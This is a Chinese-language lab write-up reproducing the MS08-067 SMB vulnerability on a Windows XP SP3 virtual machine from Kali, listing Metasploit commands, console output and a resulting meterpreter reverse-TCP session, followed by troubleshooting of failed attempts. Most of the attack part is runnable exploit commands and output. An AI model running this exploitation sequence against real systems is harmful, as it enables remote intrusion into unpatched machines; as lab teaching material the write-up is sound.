ms08-067漏洞的复现及所遇到的问题分析
一、复现过程
靶机 | Windows XP Service Pack 3 | IP地址:192.168.244.133 |
攻击机 | Kali |
IP地址:192.168.244.138 |
1、执行命令:msfconsole
┌──(root㉿kali)-[~/桌面]
└─# msfconsole# cowsay++____________
< metasploit >------------\ ,__,\ (oo)____(__) )\||--|| *=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
2、执行命令:search ms08-067
msf6 > search ms08-067Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
3、执行命令:use 0 或 use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
4、执行命令:show options
msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The SMB service port (TCP)SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.244.138 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic Targeting
5、执行命令:show targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targetsExploit targets:Id Name-- ----32 Windows XP SP3 Arabic (NX)33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)34 Windows XP SP3 Chinese - Simplified (NX)35 Windows XP SP3 Chinese - Traditional (NX)36 Windows XP SP3 Czech (NX)
6、执行命令:set target 34 和 set rhost 192.168.244.138
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
7、执行命令:set rhost 192.168.244.133
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.244.133
rhost => 192.168.244.133
8、执行命令:show options
msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS 192.168.244.133 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The SMB service port (TCP)SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.244.138 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----34 Windows XP SP3 Chinese - Simplified (NX)
9、执行命令:exploit
msf6 exploit(windows/smb/ms08_067_netapi) > exploit[*] Started reverse TCP handler on 192.168.244.138:4444
[*] 192.168.244.133:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.244.133
[*] Meterpreter session 1 opened (192.168.244.138:4444 -> 192.168.244.133:1061 ) at 2022-10-06 20:36:00 +0800
8、执行命令:ipconfig
meterpreter > ifconfigInterface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter -
Hardware MAC : 00:0c:29:31:24:dc
MTU : 1500
IPv4 Address : 192.168.244.133
IPv4 Netmask : 255.255.255.0
二、遇到的问题
msf6 exploit(window/amb/nsto_067_notapi) > exploit
[*] Started reverse TCP handler on 192.168.43.75:135
[-] 192.168.244.133:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.244.138:4444
[-] 192.168.244.144:445 - Exploit failed [unreachable]: Rex:: HostUnreachable The host (192.168.244.144:445) was unreachable.
[*] Exploit completed, but no session was created.
1、执行exploit命令后提示:Exploit failed [unreachable]: Rex:: HostUnreachable The host was unreachable. 或 Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.
出现这两种问题的原因可能有以下三个:
(1)靶机的防火墙或杀毒未关或如火绒这类的安全软件未退出。
当已经确定防火墙关闭时,要去检查安全软件是否退出,因为火绒会进行拦截。
(2)靶机和攻击机不在一个网段内,不能互相ping通。
(3)靶机的端口没有打开,即RPORT中所对应的端口没有打开。
注:优先考虑前两个原因,当前两个原因检查之后确定无误时,再去检查端口的状态。
2、执行exploit命令后提示:Exploit completed, but no session was created.
出现该问题的原因可能有以下两个:
(1)靶机版本不支持
下载Windows XP SP3 English。
(2)未指定靶机的版本号,在执行show targets命令后,找到与自己靶机相对应版本的版本号,如Windows XP SP3 Chinese - Simplified (NX)的版本号为34,执行set target 34 为自己的靶机指定版本号。
ms08-067漏洞的复现及所遇到的问题分析相关推荐
- tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现
一.漏洞背景2020年02月20日,国家信息安全漏洞共享平台(CNVD)发布了关于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安全公告.Tom ...
- nginx解析漏洞简单复现及修复
Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...
- Apache Struts2远程代码执行漏洞(S2-019)复现
动态方法调用是一种已知会施加可 Apache Struts2远程代码执行漏洞(S2-019)复现能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭. S2-019的poc,是deb ...
- MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现 一.简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司 ...
- Heartbleed漏洞的复现与利用
一. 1.Heartbleed漏洞是什么 Openssl在处理心跳包的时候检测漏洞,没有检测payload与实际的数据字段是否匹配,造成最大64KB的内存泄漏 2.基本背景和影响 OpenS ...
- ThinkPHP漏洞总结复现
ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...
- Ubuntu内核提权(CVE-2017-16995)漏洞的复现脏牛漏洞
Ubuntu内核提权漏洞的复现 这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux .近期有白帽子爆出 ubuntu 的最新版本 ...
- 方程式 Eternalblue 漏洞利用复现
漏洞原理 详细的漏洞原理参照文章: http://www.91ri.org/16946.html 懒得点连接的大人们可以看这里: 首先SrvOs2FeaListToNt首先调用SrvOs2FeaLis ...
- weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现
1.漏洞介绍 CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件.攻击者突破了OAM(Oracle Access ...
最新文章
- SAP MM初阶之ME12里为啥只能维护少量条件类型的价格?
- 【system generator】基于system generator的根号运算系统实现
- Java8:Lambda表达式增强版Comparator和排序
- leetcode18. 四数之和
- 飞鸽传书2012绿色版下载
- Flask框架——路由和视图
- linux学习查看系统资源和磁盘分区
- java中输入的程序_Java中输入的用法
- 中国的脑部研究--脑网络组图谱
- 删除单链表中指针q指向的结点
- 用R进行meta分析(metafor包)
- 详解Java 堆排序
- 数组分为两部分,使得其和相差最小
- 选手投票html,选手投票网页制作
- python如何编写爬虫程序_python编写网络爬虫程序
- 作业中关于H5中动画的实现——animation
- 字节跳动双11电商直播技术大揭秘
- 苹果电脑如何使用Siri语音助手!
- 反射 Reflect Class 基础 API MD
- Android Jetpack annotation